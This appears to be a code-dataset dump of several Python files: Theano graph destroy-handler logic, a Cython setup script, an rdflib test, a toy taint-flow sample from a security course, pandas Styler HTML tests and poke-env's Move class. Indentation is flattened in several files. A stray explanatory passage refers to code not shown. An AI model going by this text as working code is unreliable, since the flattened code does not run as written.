def on_prune(self, fgraph, app, reason):
"""
Remove Apply instance from set which must be computed.
"""
if app not in self.debug_all_apps:
raise ProtocolError("prune without import")
self.debug_all_apps.remove(app)
# UPDATE self.clients
for i, input in enumerate(OrderedSet(app.inputs)):
del self.clients[input][app]
if getattr(app.op, 'destroy_map', OrderedDict()):
self.destroyers.remove(app)
# Note: leaving empty client dictionaries in the struct.
# Why? It's a pain to remove them. I think they aren't doing any harm, they will be
# deleted on_detach().
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
OrderedDict())):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
o = app.outputs[o_idx]
i = app.inputs[i_idx_list[0]]
del self.view_i[o]
self.view_o[i].remove(o)
if not self.view_o[i]:
del self.view_o[i]
self.stale_droot = True
def on_change_input(self, fgraph, app, i, old_r, new_r, reason):
"""
app.inputs[i] changed from old_r to new_r.
"""
if app == 'output':
# app == 'output' is special key that means FunctionGraph is redefining which nodes are being
# considered 'outputs' of the graph.
pass
else:
if app not in self.debug_all_apps:
raise ProtocolError("change without import")
# UPDATE self.clients
self.clients[old_r][app] -= 1
if self.clients[old_r][app] == 0:
del self.clients[old_r][app]
self.clients.setdefault(new_r, OrderedDict()).setdefault(app, 0)
self.clients[new_r][app] += 1
# UPDATE self.view_i, self.view_o
for o_idx, i_idx_list in iteritems(getattr(app.op, 'view_map',
OrderedDict())):
if len(i_idx_list) > 1:
# destroying this output invalidates multiple inputs
raise NotImplementedError()
i_idx = i_idx_list[0]
output = app.outputs[o_idx]
if i_idx == i:
if app.inputs[i_idx] is not new_r:
raise ProtocolError("wrong new_r on change")
self.view_i[output] = new_r
self.view_o[old_r].remove(output)
if not self.view_o[old_r]:
del self.view_o[old_r]
self.view_o.setdefault(new_r, OrderedSet()).add(output)
self.stale_droot = True
def validate(self, fgraph):
"""
Return None.
Raise InconsistencyError when
a) orderings() raises an error
b) orderings cannot be topologically sorted.
"""
if self.destroyers:
ords = self.orderings(fgraph)
if _contains_cycle(fgraph, ords):
raise InconsistencyError("Dependency graph contains cycles")
else:
# James's Conjecture:
# If there are no destructive ops, then there can be no cycles.
            # FB: This isn't always true. It can happen that an
            # optimization introduces a node that depends on itself. This
            # is very rare and should not happen in general. It will be
            # caught later, but the error will be far from the source. Still,
            # making this conjecture should speed up compilation most of
            # the time. The user should not create such a dependency unless
            # they mess too much with the internals.
pass
return True
def orderings(self, fgraph):
"""
Return orderings induced by destructive operations.
Raise InconsistencyError when
        a) attempting to destroy an indestructible variable, or
b) attempting to destroy a value multiple times, or
c) an Apply destroys (illegally) one of its own inputs by aliasing
"""
rval = OrderedDict()
if self.destroyers:
# BUILD DATA STRUCTURES
# CHECK for multiple destructions during construction of variables
droot, impact, __ignore = self.refresh_droot_impact()
# check for destruction of constants
illegal_destroy = [r for r in droot if
getattr(r.tag, 'indestructible', False) or
isinstance(r, graph.Constant)]
if illegal_destroy:
raise InconsistencyError(
"Attempting to destroy indestructible variables: %s" %
illegal_destroy)
# add destroyed variable clients as computational dependencies
for app in self.destroyers:
# for each destroyed input...
for output_idx, input_idx_list in iteritems(app.op.destroy_map):
destroyed_idx = input_idx_list[0]
destroyed_variable = app.inputs[destroyed_idx]
root = droot[destroyed_variable]
root_impact = impact[root]
# we generally want to put all clients of things which depend on root
# as pre-requisites of app.
# But, app is itself one such client!
# App will always be a client of the node we're destroying
# (destroyed_variable, but the tricky thing is when it is also a client of
# *another variable* viewing on the root. Generally this is illegal, (e.g.,
# add_inplace(x, x.T). In some special cases though, the in-place op will
# actually be able to work properly with multiple destroyed inputs (e.g,
# add_inplace(x, x). An Op that can still work in this case should declare
# so via the 'destroyhandler_tolerate_same' attribute or
# 'destroyhandler_tolerate_aliased' attribute.
#
# destroyhandler_tolerate_same should be a list of pairs of the form
# [(idx0, idx1), (idx0, idx2), ...]
# The first element of each pair is the input index of a destroyed
# variable.
# The second element of each pair is the index of a different input where
# we will permit exactly the same variable to appear.
# For example, add_inplace.tolerate_same might be [(0,1)] if the destroyed
# input is also allowed to appear as the second argument.
#
# destroyhandler_tolerate_aliased is the same sort of list of
# pairs.
# op.destroyhandler_tolerate_aliased = [(idx0, idx1)] tells the
# destroyhandler to IGNORE an aliasing between a destroyed
# input idx0 and another input idx1.
# This is generally a bad idea, but it is safe in some
# cases, such as
# - the op reads from the aliased idx1 before modifying idx0
# - the idx0 and idx1 are guaranteed not to overlap (e.g.
# they are pointed at different rows of a matrix).
#
# CHECK FOR INPUT ALIASING
# OPT: pre-compute this on import
tolerate_same = getattr(app.op,
'destroyhandler_tolerate_same', [])
assert isinstance(tolerate_same, list)
tolerated = OrderedSet(idx1 for idx0, idx1 in tolerate_same
if idx0 == destroyed_idx)
tolerated.add(destroyed_idx)
tolerate_aliased = getattr(
app.op, 'destroyhandler_tolerate_aliased', [])
assert isinstance(tolerate_aliased, list)
ignored = OrderedSet(idx1 for idx0, idx1 in tolerate_aliased
if idx0 == destroyed_idx)
# print 'tolerated', tolerated
# print 'ignored', ignored
for i, input in enumerate(app.inputs):
if i in ignored:
continue
if input in root_impact \
and (i not in tolerated or
input is not destroyed_variable):
raise InconsistencyError("Input aliasing: %s (%i, %i)"
% (app, destroyed_idx, i))
# add the rule: app must be preceded by all other Apply instances that
# depend on destroyed_input
root_clients = OrderedSet()
for r in root_impact:
assert not [a for a, c in self.clients[r].items() if not c]
root_clients.update([a for a, c in self.clients[r].items() if c])
root_clients.remove(app)
if root_clients:
rval[app] = root_clients
return rval
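The heart of `_contains_cycle` above is a Kahn-style topological sweep over Variable and Apply nodes, with the extra `orderings` edges folded into each node's parent set. As a simplified, hedged sketch of the same idea on a plain dependency dict (not Theano's actual data structures):

```python
# Simplified sketch of the cycle check used by _contains_cycle above:
# Kahn's algorithm over a generic {node: set_of_parents} dependency map.
# (Theano builds its map from Variable.owner / Apply.inputs plus `orderings`.)
from collections import deque

def contains_cycle(parents_of):
    # parents_of: dict mapping every node to the set of nodes that must run first
    parent_counts = {n: len(ps) for n, ps in parents_of.items()}
    children_of = {}
    for node, parents in parents_of.items():
        for p in parents:
            children_of.setdefault(p, []).append(node)
    visitable = deque(n for n, c in parent_counts.items() if c == 0)
    visited = 0
    while visitable:
        node = visitable.popleft()
        visited += 1
        for child in children_of.get(node, []):
            parent_counts[child] -= 1
            if parent_counts[child] == 0:
                visitable.append(child)
    # If some node was never visited, its unmet parents form a cycle.
    return visited != len(parent_counts)

# a -> b -> c is acyclic; adding c -> a closes a cycle.
assert contains_cycle({"a": set(), "b": {"a"}, "c": {"b"}}) is False
assert contains_cycle({"a": {"c"}, "b": {"a"}, "c": {"b"}}) is True
```

The real implementation interleaves Variables and Apply nodes and is tuned for speed, but the termination test is the same: if the sweep visits fewer nodes than exist, a cycle blocked it.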
avg_line_length: 42.005854 | max_line_length: 109 | alphanum_fraction: 0.571001

hexsha: ac90c1ce33f0dc5fe69d17a9d10aa45508603969 | size: 955 | ext: py | lang: Python
max_stars_repo: path libnd4j/auto_vectorization/cython_setup.py | name eric-erki/deeplearning4j | head_hexsha b9d462f66879e9315767b70190bd2ab31b9a3275 | licenses ["Apache-2.0"] | stars_count null | stars_event_min/max_datetime null
max_issues_repo: path libnd4j/auto_vectorization/cython_setup.py | name eric-erki/deeplearning4j | head_hexsha b9d462f66879e9315767b70190bd2ab31b9a3275 | licenses ["Apache-2.0"] | issues_count null | issues_event_min/max_datetime null
max_forks_repo: path libnd4j/auto_vectorization/cython_setup.py | name eric-erki/deeplearning4j | head_hexsha b9d462f66879e9315767b70190bd2ab31b9a3275 | licenses ["Apache-2.0"] | forks_count null | forks_event_min/max_datetime null
content:
# /* ******************************************************************************
# * Copyright (c) 2021 Deeplearning4j Contributors
# *
# * This program and the accompanying materials are made available under the
# * terms of the Apache License, Version 2.0 which is available at
# * https://www.apache.org/licenses/LICENSE-2.0.
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# * License for the specific language governing permissions and limitations
# * under the License.
# *
# * SPDX-License-Identifier: Apache-2.0
# ******************************************************************************/
from distutils.core import setup
from Cython.Build import cythonize
setup(ext_modules=cythonize("bigGzipJson.pyx", language_level="3"))
avg_line_length: 47.75 | max_line_length: 84 | alphanum_fraction: 0.606283

hexsha: 48f2e4de851d53249c37a5389990dd64d992a6e1 | size: 857 | ext: py | lang: Python
max_stars_repo: path test/test_issue923.py | name tonyfast/rdflib | head_hexsha e4fe0fdbd4de7e1183418f302315b51a14602e03 | licenses ["BSD-3-Clause"] | stars_count 2 | stars_event 2021-02-06T17:36:05.000Z to 2021-04-21T07:33:39.000Z
max_issues_repo: path test/test_issue923.py | name pragya16067/rdflib | head_hexsha 6b5bd37ccc67bdec62d2e36d174eb7933b5020b2 | licenses ["BSD-3-Clause"] | issues_count 2 | issues_event 2020-05-09T15:03:57.000Z to 2020-05-30T10:51:40.000Z
max_forks_repo: path test/test_issue923.py | name pragya16067/rdflib | head_hexsha 6b5bd37ccc67bdec62d2e36d174eb7933b5020b2 | licenses ["BSD-3-Clause"] | forks_count 4 | forks_event 2020-05-08T08:36:19.000Z to 2020-05-28T07:23:23.000Z
content:
"""
Issue 923: split charset off of Content-Type before looking up Result-parsing plugin.
"""
from io import StringIO
from rdflib.query import Result
RESULT_SOURCE = u"""\
{
"head" : {
"vars" : [ "subject", "predicate", "object", "context" ]
},
"results" : {
"bindings" : [ {
"subject" : {
"type" : "bnode",
"value" : "service"
},
"predicate" : {
"type" : "uri",
"value" : "http://www.w3.org/1999/02/22-rdf-syntax-ns#type"
},
"object" : {
"type" : "uri",
"value" : "http://www.w3.org/ns/sparql-service-description#Service"
}
}]
}
}
"""
def test_issue_923():
with StringIO(RESULT_SOURCE) as result_source:
Result.parse(
source=result_source,
content_type="application/sparql-results+json;charset=utf-8",
)
avg_line_length: 21.974359 | max_line_length: 85 | alphanum_fraction: 0.546091

hexsha: 7afe0e0a22b822708018357bece0a9ad433352e3 | size: 51 | ext: py | lang: Python
max_stars_repo: path T03-24/program.py | name maa76/SSof-Project1920 | head_hexsha 9b4ad9ac41a648c425fcfcd49cd52ff84e528bde | licenses ["MIT"] | stars_count 2 | stars_event 2019-11-20T19:26:07.000Z to 2019-11-22T00:42:23.000Z
max_issues_repo: path T03-24/program.py | name maa76/SSof-Project1920 | head_hexsha 9b4ad9ac41a648c425fcfcd49cd52ff84e528bde | licenses ["MIT"] | issues_count 2 | issues_event 2019-11-28T05:21:24.000Z to 2019-11-28T05:21:58.000Z
max_forks_repo: path T03-24/program.py | name maa76/SSof-Project1920 | head_hexsha 9b4ad9ac41a648c425fcfcd49cd52ff84e528bde | licenses ["MIT"] | forks_count 25 | forks_event 2019-11-27T01:40:56.000Z to 2019-12-04T23:38:59.000Z
content:
a = True
while not True:
a = get()
execute(a)
avg_line_length: 10.2 | max_line_length: 16 | alphanum_fraction: 0.568627

hexsha: b98a548101877c860f426326cba159b7991da7b4 | size: 18,571 | ext: py | lang: Python
max_stars_repo: path pandas/tests/io/formats/style/test_html.py | name gasparitiago/pandas | head_hexsha c4cce9b75b34179edf000314edf708768486fcbb | licenses ["BSD-3-Clause"] | stars_count null | stars_event_min/max_datetime null
max_issues_repo: path pandas/tests/io/formats/style/test_html.py | name gasparitiago/pandas | head_hexsha c4cce9b75b34179edf000314edf708768486fcbb | licenses ["BSD-3-Clause"] | issues_count null | issues_event_min/max_datetime null
max_forks_repo: path pandas/tests/io/formats/style/test_html.py | name gasparitiago/pandas | head_hexsha c4cce9b75b34179edf000314edf708768486fcbb | licenses ["BSD-3-Clause"] | forks_count null | forks_event_min/max_datetime null
content:
from textwrap import dedent
import numpy as np
import pytest
from pandas import (
DataFrame,
MultiIndex,
option_context,
)
jinja2 = pytest.importorskip("jinja2")
from pandas.io.formats.style import Styler
loader = jinja2.PackageLoader("pandas", "io/formats/templates")
env = jinja2.Environment(loader=loader, trim_blocks=True)
@pytest.fixture
def styler():
return Styler(DataFrame([[2.61], [2.69]], index=["a", "b"], columns=["A"]))
@pytest.fixture
def styler_mi():
midx = MultiIndex.from_product([["a", "b"], ["c", "d"]])
return Styler(DataFrame(np.arange(16).reshape(4, 4), index=midx, columns=midx))
@pytest.fixture
def tpl_style():
return env.get_template("html_style.tpl")
@pytest.fixture
def tpl_table():
return env.get_template("html_table.tpl")
def test_html_template_extends_options():
# make sure if templates are edited tests are updated as are setup fixtures
# to understand the dependency
with open("pandas/io/formats/templates/html.tpl") as file:
result = file.read()
assert "{% include html_style_tpl %}" in result
assert "{% include html_table_tpl %}" in result
def test_exclude_styles(styler):
result = styler.to_html(exclude_styles=True, doctype_html=True)
expected = dedent(
"""\
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<table>
<thead>
<tr>
<th > </th>
<th >A</th>
</tr>
</thead>
<tbody>
<tr>
<th >a</th>
<td >2.610000</td>
</tr>
<tr>
<th >b</th>
<td >2.690000</td>
</tr>
</tbody>
</table>
</body>
</html>
"""
)
assert result == expected
def test_w3_html_format(styler):
styler.set_uuid("").set_table_styles(
[{"selector": "th", "props": "att2:v2;"}]
).applymap(lambda x: "att1:v1;").set_table_attributes(
'class="my-cls1" style="attr3:v3;"'
).set_td_classes(
DataFrame(["my-cls2"], index=["a"], columns=["A"])
).format(
"{:.1f}"
).set_caption(
"A comprehensive test"
)
expected = dedent(
"""\
<style type="text/css">
#T_ th {
att2: v2;
}
#T__row0_col0, #T__row1_col0 {
att1: v1;
}
</style>
<table id="T_" class="my-cls1" style="attr3:v3;">
<caption>A comprehensive test</caption>
<thead>
<tr>
<th class="blank level0" > </th>
<th id="T__level0_col0" class="col_heading level0 col0" >A</th>
</tr>
</thead>
<tbody>
<tr>
<th id="T__level0_row0" class="row_heading level0 row0" >a</th>
<td id="T__row0_col0" class="data row0 col0 my-cls2" >2.6</td>
</tr>
<tr>
<th id="T__level0_row1" class="row_heading level0 row1" >b</th>
<td id="T__row1_col0" class="data row1 col0" >2.7</td>
</tr>
</tbody>
</table>
"""
)
assert expected == styler.to_html()
def test_colspan_w3():
# GH 36223
df = DataFrame(data=[[1, 2]], columns=[["l0", "l0"], ["l1a", "l1b"]])
styler = Styler(df, uuid="_", cell_ids=False)
assert '<th class="col_heading level0 col0" colspan="2">l0</th>' in styler.to_html()
def test_rowspan_w3():
# GH 38533
df = DataFrame(data=[[1, 2]], index=[["l0", "l0"], ["l1a", "l1b"]])
styler = Styler(df, uuid="_", cell_ids=False)
assert '<th class="row_heading level0 row0" rowspan="2">l0</th>' in styler.to_html()
def test_styles(styler):
styler.set_uuid("abc")
styler.set_table_styles([{"selector": "td", "props": "color: red;"}])
result = styler.to_html(doctype_html=True)
expected = dedent(
"""\
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<style type="text/css">
#T_abc td {
color: red;
}
</style>
</head>
<body>
<table id="T_abc">
<thead>
<tr>
<th class="blank level0" > </th>
<th id="T_abc_level0_col0" class="col_heading level0 col0" >A</th>
</tr>
</thead>
<tbody>
<tr>
<th id="T_abc_level0_row0" class="row_heading level0 row0" >a</th>
<td id="T_abc_row0_col0" class="data row0 col0" >2.610000</td>
</tr>
<tr>
<th id="T_abc_level0_row1" class="row_heading level0 row1" >b</th>
<td id="T_abc_row1_col0" class="data row1 col0" >2.690000</td>
</tr>
</tbody>
</table>
</body>
</html>
"""
)
assert result == expected
def test_doctype(styler):
result = styler.to_html(doctype_html=False)
assert "<html>" not in result
assert "<body>" not in result
assert "<!DOCTYPE html>" not in result
assert "<head>" not in result
def test_doctype_encoding(styler):
with option_context("styler.render.encoding", "ASCII"):
result = styler.to_html(doctype_html=True)
assert '<meta charset="ASCII">' in result
result = styler.to_html(doctype_html=True, encoding="ANSI")
assert '<meta charset="ANSI">' in result
def test_bold_headers_arg(styler):
result = styler.to_html(bold_headers=True)
assert "th {\n font-weight: bold;\n}" in result
result = styler.to_html()
assert "th {\n font-weight: bold;\n}" not in result
def test_caption_arg(styler):
result = styler.to_html(caption="foo bar")
assert "<caption>foo bar</caption>" in result
result = styler.to_html()
assert "<caption>foo bar</caption>" not in result
def test_block_names(tpl_style, tpl_table):
# catch accidental removal of a block
expected_style = {
"before_style",
"style",
"table_styles",
"before_cellstyle",
"cellstyle",
}
expected_table = {
"before_table",
"table",
"caption",
"thead",
"tbody",
"after_table",
"before_head_rows",
"head_tr",
"after_head_rows",
"before_rows",
"tr",
"after_rows",
}
result1 = set(tpl_style.blocks)
assert result1 == expected_style
result2 = set(tpl_table.blocks)
assert result2 == expected_table
def test_from_custom_template_table(tmpdir):
p = tmpdir.mkdir("tpl").join("myhtml_table.tpl")
p.write(
dedent(
"""\
{% extends "html_table.tpl" %}
{% block table %}
<h1>{{custom_title}}</h1>
{{ super() }}
{% endblock table %}"""
)
)
result = Styler.from_custom_template(str(tmpdir.join("tpl")), "myhtml_table.tpl")
assert issubclass(result, Styler)
assert result.env is not Styler.env
assert result.template_html_table is not Styler.template_html_table
styler = result(DataFrame({"A": [1, 2]}))
assert "<h1>My Title</h1>\n\n\n<table" in styler.to_html(custom_title="My Title")
def test_from_custom_template_style(tmpdir):
p = tmpdir.mkdir("tpl").join("myhtml_style.tpl")
p.write(
dedent(
"""\
{% extends "html_style.tpl" %}
{% block style %}
<link rel="stylesheet" href="mystyle.css">
{{ super() }}
{% endblock style %}"""
)
)
result = Styler.from_custom_template(
str(tmpdir.join("tpl")), html_style="myhtml_style.tpl"
)
assert issubclass(result, Styler)
assert result.env is not Styler.env
assert result.template_html_style is not Styler.template_html_style
styler = result(DataFrame({"A": [1, 2]}))
assert '<link rel="stylesheet" href="mystyle.css">\n\n<style' in styler.to_html()
def test_caption_as_sequence(styler):
styler.set_caption(("full cap", "short cap"))
assert "<caption>full cap</caption>" in styler.to_html()
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
@pytest.mark.parametrize("index_name", [True, False])
def test_sticky_basic(styler, index, columns, index_name):
if index_name:
styler.index.name = "some text"
if index:
styler.set_sticky(axis=0)
if columns:
styler.set_sticky(axis=1)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: 0px;\n z-index: {1};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n z-index: {2};\n{3}}}"
)
res = styler.set_uuid("").to_html()
# test index stickys over thead and tbody
assert (left_css.format("thead tr th:nth-child(1)", "3 !important") in res) is index
assert (left_css.format("tbody tr th:nth-child(1)", "1") in res) is index
# test column stickys including if name row
assert (
top_css.format("thead tr:nth-child(1) th", "0", "2", " height: 25px;\n") in res
) is (columns and index_name)
assert (
top_css.format("thead tr:nth-child(2) th", "25", "2", " height: 25px;\n")
in res
) is (columns and index_name)
assert (top_css.format("thead tr:nth-child(1) th", "0", "2", "") in res) is (
columns and not index_name
)
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
def test_sticky_mi(styler_mi, index, columns):
if index:
styler_mi.set_sticky(axis=0)
if columns:
styler_mi.set_sticky(axis=1)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: {1}px;\n min-width: 75px;\n max-width: 75px;\n z-index: {2};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n height: 25px;\n z-index: {2};\n}}"
)
res = styler_mi.set_uuid("").to_html()
# test the index stickys for thead and tbody over both levels
assert (
left_css.format("thead tr th:nth-child(1)", "0", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level0", "0", "1") in res) is index
assert (
left_css.format("thead tr th:nth-child(2)", "75", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level1", "75", "1") in res) is index
# test the column stickys for each level row
assert (top_css.format("thead tr:nth-child(1) th", "0", "2") in res) is columns
assert (top_css.format("thead tr:nth-child(2) th", "25", "2") in res) is columns
@pytest.mark.parametrize("index", [False, True])
@pytest.mark.parametrize("columns", [False, True])
@pytest.mark.parametrize("levels", [[1], ["one"], "one"])
def test_sticky_levels(styler_mi, index, columns, levels):
styler_mi.index.names, styler_mi.columns.names = ["zero", "one"], ["zero", "one"]
if index:
styler_mi.set_sticky(axis=0, levels=levels)
if columns:
styler_mi.set_sticky(axis=1, levels=levels)
left_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" left: {1}px;\n min-width: 75px;\n max-width: 75px;\n z-index: {2};\n}}"
)
top_css = (
"#T_ {0} {{\n position: sticky;\n background-color: white;\n"
" top: {1}px;\n height: 25px;\n z-index: {2};\n}}"
)
res = styler_mi.set_uuid("").to_html()
# test no sticking of level0
assert "#T_ thead tr th:nth-child(1)" not in res
assert "#T_ tbody tr th.level0" not in res
assert "#T_ thead tr:nth-child(1) th" not in res
# test sticking level1
assert (
left_css.format("thead tr th:nth-child(2)", "0", "3 !important") in res
) is index
assert (left_css.format("tbody tr th.level1", "0", "1") in res) is index
assert (top_css.format("thead tr:nth-child(2) th", "0", "2") in res) is columns
def test_sticky_raises(styler):
with pytest.raises(ValueError, match="No axis named bad for object type DataFrame"):
styler.set_sticky(axis="bad")
@pytest.mark.parametrize(
"sparse_index, sparse_columns",
[(True, True), (True, False), (False, True), (False, False)],
)
def test_sparse_options(sparse_index, sparse_columns):
cidx = MultiIndex.from_tuples([("Z", "a"), ("Z", "b"), ("Y", "c")])
ridx = MultiIndex.from_tuples([("A", "a"), ("A", "b"), ("B", "c")])
df = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], index=ridx, columns=cidx)
styler = df.style
default_html = styler.to_html() # defaults under pd.options to (True , True)
with option_context(
"styler.sparse.index", sparse_index, "styler.sparse.columns", sparse_columns
):
html1 = styler.to_html()
assert (html1 == default_html) is (sparse_index and sparse_columns)
html2 = styler.to_html(sparse_index=sparse_index, sparse_columns=sparse_columns)
assert html1 == html2
@pytest.mark.parametrize("index", [True, False])
@pytest.mark.parametrize("columns", [True, False])
def test_applymap_header_cell_ids(styler, index, columns):
# GH 41893
func = lambda v: "attr: val;"
styler.uuid, styler.cell_ids = "", False
if index:
styler.applymap_index(func, axis="index")
if columns:
styler.applymap_index(func, axis="columns")
result = styler.to_html()
# test no data cell ids
assert '<td class="data row0 col0" >2.610000</td>' in result
assert '<td class="data row1 col0" >2.690000</td>' in result
# test index header ids where needed and css styles
assert (
'<th id="T__level0_row0" class="row_heading level0 row0" >a</th>' in result
) is index
assert (
'<th id="T__level0_row1" class="row_heading level0 row1" >b</th>' in result
) is index
assert ("#T__level0_row0, #T__level0_row1 {\n attr: val;\n}" in result) is index
# test column header ids where needed and css styles
assert (
'<th id="T__level0_col0" class="col_heading level0 col0" >A</th>' in result
) is columns
assert ("#T__level0_col0 {\n attr: val;\n}" in result) is columns
@pytest.mark.parametrize("rows", [True, False])
@pytest.mark.parametrize("cols", [True, False])
def test_maximums(styler_mi, rows, cols):
result = styler_mi.to_html(
max_rows=2 if rows else None,
max_columns=2 if cols else None,
)
assert ">5</td>" in result # [[0,1], [4,5]] always visible
assert (">8</td>" in result) is not rows # first trimmed vertical element
assert (">2</td>" in result) is not cols # first trimmed horizontal element
def test_replaced_css_class_names(styler_mi):
css = {
"row_heading": "ROWHEAD",
# "col_heading": "COLHEAD",
"index_name": "IDXNAME",
# "col": "COL",
"row": "ROW",
# "col_trim": "COLTRIM",
"row_trim": "ROWTRIM",
"level": "LEVEL",
"data": "DATA",
"blank": "BLANK",
}
midx = MultiIndex.from_product([["a", "b"], ["c", "d"]])
styler_mi = Styler(
DataFrame(np.arange(16).reshape(4, 4), index=midx, columns=midx),
uuid_len=0,
).set_table_styles(css_class_names=css)
styler_mi.index.names = ["n1", "n2"]
styler_mi.hide_index(styler_mi.index[1:])
styler_mi.hide_columns(styler_mi.columns[1:])
styler_mi.applymap_index(lambda v: "color: red;", axis=0)
styler_mi.applymap_index(lambda v: "color: green;", axis=1)
styler_mi.applymap(lambda v: "color: blue;")
expected = dedent(
"""\
<style type="text/css">
#T__ROW0_col0 {
color: blue;
}
#T__LEVEL0_ROW0, #T__LEVEL1_ROW0 {
color: red;
}
#T__LEVEL0_col0, #T__LEVEL1_col0 {
color: green;
}
</style>
<table id="T_">
<thead>
<tr>
<th class="BLANK" > </th>
<th class="IDXNAME LEVEL0" >n1</th>
<th id="T__LEVEL0_col0" class="col_heading LEVEL0 col0" >a</th>
</tr>
<tr>
<th class="BLANK" > </th>
<th class="IDXNAME LEVEL1" >n2</th>
<th id="T__LEVEL1_col0" class="col_heading LEVEL1 col0" >c</th>
</tr>
<tr>
<th class="IDXNAME LEVEL0" >n1</th>
<th class="IDXNAME LEVEL1" >n2</th>
<th class="BLANK col0" > </th>
</tr>
</thead>
<tbody>
<tr>
<th id="T__LEVEL0_ROW0" class="ROWHEAD LEVEL0 ROW0" >a</th>
<th id="T__LEVEL1_ROW0" class="ROWHEAD LEVEL1 ROW0" >c</th>
<td id="T__ROW0_col0" class="DATA ROW0 col0" >0</td>
</tr>
<tr>
</tr>
<tr>
</tr>
<tr>
</tr>
</tbody>
</table>
"""
)
result = styler_mi.to_html()
assert result == expected
def test_include_css_style_rules_only_for_visible_cells(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap(lambda v: "color: blue;")
.hide_columns(styler_mi.data.columns[1:])
.hide_index(styler_mi.data.index[1:])
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__row0_col0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
def test_include_css_style_rules_only_for_visible_index_labels(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap_index(lambda v: "color: blue;", axis="index")
.hide_columns(styler_mi.data.columns)
.hide_index(styler_mi.data.index[1:])
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__level0_row0, #T__level1_row0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
def test_include_css_style_rules_only_for_visible_column_labels(styler_mi):
# GH 43619
result = (
styler_mi.set_uuid("")
.applymap_index(lambda v: "color: blue;", axis="columns")
.hide_columns(styler_mi.data.columns[1:])
.hide_index(styler_mi.data.index)
.to_html()
)
expected_styles = dedent(
"""\
<style type="text/css">
#T__level0_col0, #T__level1_col0 {
color: blue;
}
</style>
"""
)
assert expected_styles in result
| 30.544408
| 88
| 0.577029
|
5d4aa998e1af997675a5fd4ac6be020f32f71d33
| 25,252
|
py
|
Python
|
src/poke_env/environment/move.py
|
etafer/poke-env
|
2a96969ea1afb3f2576a6a8711a9a268b3ac8ee4
|
[
"MIT"
] | 145
|
2019-11-01T22:38:02.000Z
|
2022-03-21T06:06:18.000Z
|
src/poke_env/environment/move.py
|
Benjamin-Etheredge/poke-env
|
30462cecd2e947ab6f0b06b0f2febbdde3918366
|
[
"MIT"
] | 229
|
2019-11-11T09:51:45.000Z
|
2022-03-29T10:16:24.000Z
|
src/poke_env/environment/move.py
|
Benjamin-Etheredge/poke-env
|
30462cecd2e947ab6f0b06b0f2febbdde3918366
|
[
"MIT"
] | 77
|
2019-11-11T09:17:18.000Z
|
2022-03-17T11:33:48.000Z
|
# -*- coding: utf-8 -*-
from poke_env.data import MOVES, GEN_TO_MOVES
from poke_env.environment.field import Field
from poke_env.environment.move_category import MoveCategory
from poke_env.environment.pokemon_type import PokemonType
from poke_env.environment.status import Status
from poke_env.environment.weather import Weather
from poke_env.utils import to_id_str
from functools import lru_cache
from typing import Dict
from typing import List
from typing import Optional
from typing import Set
from typing import Tuple
from typing import Union
SPECIAL_MOVES: Dict
_PROTECT_MOVES = {
"protect",
"detect",
"endure",
"spikyshield",
"kingsshield",
"banefulbunker",
"obstruct",
"maxguard",
}
_SIDE_PROTECT_MOVES = {"wideguard", "quickguard", "matblock"}
_PROTECT_COUNTER_MOVES = _PROTECT_MOVES | _SIDE_PROTECT_MOVES
class Move:
_MISC_FLAGS = [
"onModifyMove",
"onEffectiveness",
"onHitField",
"onAfterMoveSecondarySelf",
"onHit",
"onTry",
"beforeTurnCallback",
"onAfterMove",
"onTryHit",
"onTryMove",
"hasCustomRecoil",
"onMoveFail",
"onPrepareHit",
"onAfterHit",
"onBasePower",
"basePowerCallback",
"damageCallback",
"onTryHitSide",
"beforeMoveCallback",
]
_MOVES_DICT = GEN_TO_MOVES[8]
__slots__ = "_id", "_current_pp", "_dynamaxed_move", "_is_empty", "_request_target"
def __init__(self, move: str = "", move_id: Optional[str] = None):
if move_id:
self._id = move_id
else:
self._id: str = self.retrieve_id(move)
self._current_pp = self.max_pp
self._is_empty: bool = False
self._dynamaxed_move = None
self._request_target = None
def __repr__(self) -> str:
return f"{self._id} (Move object)"
def use(self) -> None:
self._current_pp -= 1
@staticmethod
def is_id_z(id_) -> bool:
if id_.startswith("z") and id_[1:] in MOVES:
return True
return "isZ" in MOVES[id_]
@staticmethod
def is_max_move(id_) -> bool:
if id_.startswith("max"):
return True
elif MOVES[id_].get("isNonstandard", None) == "Gigantamax":
return True
elif MOVES[id_].get("isMax", None) is not None:
return True
return False
@staticmethod
@lru_cache(4096)
def should_be_stored(move_id: str) -> bool:
if move_id in SPECIAL_MOVES:
return False
if move_id not in MOVES:
return False
if Move.is_id_z(move_id):
return False
if Move.is_max_move(move_id):
return False
return True
@property
def accuracy(self) -> float:
"""
:return: The move's accuracy (0 to 1 scale).
:rtype: float
"""
accuracy = self.entry["accuracy"]
if accuracy is True:
return 1.0
return accuracy / 100
@property
def base_power(self) -> int:
"""
:return: The move's base power.
:rtype: int
"""
return self.entry.get("basePower", 0)
@property
def boosts(self) -> Optional[Dict[str, float]]:
"""
:return: Boosts conferred to the target by using the move.
